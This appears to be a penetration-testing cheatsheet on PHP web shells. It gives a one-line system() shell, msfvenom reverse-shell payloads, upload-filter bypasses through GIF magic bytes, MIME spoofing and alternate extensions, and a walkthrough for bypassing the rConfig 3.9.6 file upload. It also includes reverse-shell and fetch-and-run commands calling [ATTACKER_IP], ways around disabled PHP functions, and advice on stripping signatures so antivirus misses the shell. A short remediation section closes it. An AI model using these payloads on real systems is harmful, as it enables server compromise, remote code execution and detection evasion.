π‘οΈ Methodology Checklist
- Identify PHP file upload or write capability
- Minimal shell:
<?php system($_GET['cmd']); ?> - Upload to webroot and trigger via URL:
http://[TARGET]/shell.php?cmd=id - Test command execution works
- Upgrade to full reverse shell via web shell command
- Full Laudanum PHP shell for interactive browser access
- Clean up web shell file immediately after getting reverse shell
π― Operational Context
Use when: Quick RCE via file upload or LFI-to-write β minimal PHP one-liner web shell thatβs small, fast, and bypasses many filters.
Think Dumber First: <?php system($_GET['cmd']); ?> β 29 characters, 100% functional. Upload or inject, then curl http://[TARGET]/shell.php?cmd=id. If system() blocked, try passthru(), shell_exec(), exec(), popen(), proc_open().
Skip when: PHP disabled β check file extension support and web tech fingerprinting first.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
msfvenom -p php/reverse_php LHOST=[TARGET_IP] LPORT=443 -f raw > shell.php | Generate PHP reverse shell payload |
echo 'GIF89a;' > shell.php && msfvenom -p php/reverse_php LHOST=[TARGET_IP] LPORT=443 -f raw >> shell.php | PHP payload with GIF magic bytes (bypass content-type check) |
curl -X POST -F "file=@shell.php;type=image/gif" http://[DOMAIN]/upload.php | Upload PHP as GIF via MIME type spoofing (curl) |
sudo nc -lvnp 443 | Catch the reverse shell from PHP payload |
<?php system($_GET['cmd']); ?> | Minimal PHP web shell (manual creation) |
curl http://[TARGET]/shell.php?cmd=whoami | Execute command via PHP GET parameter |
π¬ Deep Dive & Workflow
Why PHP Web Shells Work
PHP (~78% of web servers) runs server-side β uploading a .php file means the server executes your code, not just serves it. This grants direct OS access under the web server user (www-data, apache, iis apppool).
Exploiting rConfig 3.9.6 β File Upload Bypass Walkthrough
Constraint: Upload form accepts only image extensions (.png, .jpg, .gif)
Step-by-Step Burp Suite Bypass:
1. Configure browser to proxy through Burp (127.0.0.1:8080)
2. Navigate: Devices > Vendors > Add Vendor
3. Select your .php shell as "Vendor Logo"
4. Intercept the POST request in Burp
5. Locate Content-Type header for the file part:
Content-Type: application/x-php
β Change to: Content-Type: image/gif
6. Forward the modified request
Server sees a valid image Content-Type and saves the file. Access at /images/vendor/shell.php.
Magic Bytes Method (No Burp Needed)
# Prepend GIF magic bytes to make it look like a GIF to file inspectors
echo 'GIF89a;' > shell.php
msfvenom -p php/reverse_php LHOST=10.10.14.x LPORT=443 -f raw >> shell.php
# Upload normally β file inspector sees GIF signature
# Server stores file, PHP code still executesMinimal PHP Web Shell
<?php system($_GET['cmd']); ?>Access via: http://[TARGET]/shell.php?cmd=id
More feature-rich:
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>From Web Shell β Reverse Shell
Web shells are limited β use them to upgrade to a full reverse shell immediately:
# Through web shell, execute:
# (URL-encode the & and | if using GET params)
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [ATTACKER_IP] 443 > /tmp/fOr deliver via URL:
http://[TARGET]/shell.php?cmd=curl+http://[ATTACKER_IP]/rev.sh|bash
Web Shell Limitations & OPSEC
| Limitation | Impact |
|---|---|
| No interactive commands | Canβt use sudo, nano, vim interactively |
| Stateless | Each request is a new process β no persistence of directory |
| AV scans uploads | Remove comments, signatures, author credits from public shells |
| Stability | App may auto-delete uploaded files β convert to reverse shell fast |
| Documentation | Record: filename, path, hash, upload time for reporting + cleanup |
WhiteWinterWolf PHP Shell
Available at GitHub β popular in CTFs. Strip the author comments and function names before uploading in real engagements to avoid signature detection.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| system() function disabled | PHP disable_functions set | Try: passthru, shell_exec, exec, popen, proc_open β iterate through each |
| PHP shell returns blank page | All exec functions disabled | Use mail() bypass or PHP 7.4 FFI: $ffi = FFI::cdef('int system(const char *command);'); $ffi->system('cmd') |
| Web shell blocked by upload filter | Extension or content check | Try .php5, .phtml, .phar, .php7 extensions; add GIF header: GIF89a;<?php system($_GET['cmd']); ?> |
| Command output shows but special chars broken | Character encoding | Add htmlspecialchars_decode() wrapper or use raw passthru() instead of system() |
| Shell works via browser but not curl | WAF User-Agent filter | Add -A 'Mozilla/5.0 ...' to curl command to match browser UA |
π Reporting Trigger
Finding Title: PHP Web Shell Deployed via File Upload or LFI
Impact: Minimal PHP web shell achieves persistent RCE through the web server process, with direct access to the server filesystem, environment variables, and internal network from the web application context.
Root Cause: Unrestricted file upload or Local File Inclusion vulnerability allows attacker to place and execute PHP code on the server.
Recommendation: Disable dangerous PHP functions in php.ini (system, exec, shell_exec, passthru). Validate file uploads by content, not extension. Run web application under dedicated low-privilege service account. Deploy WAF with PHP web shell signatures.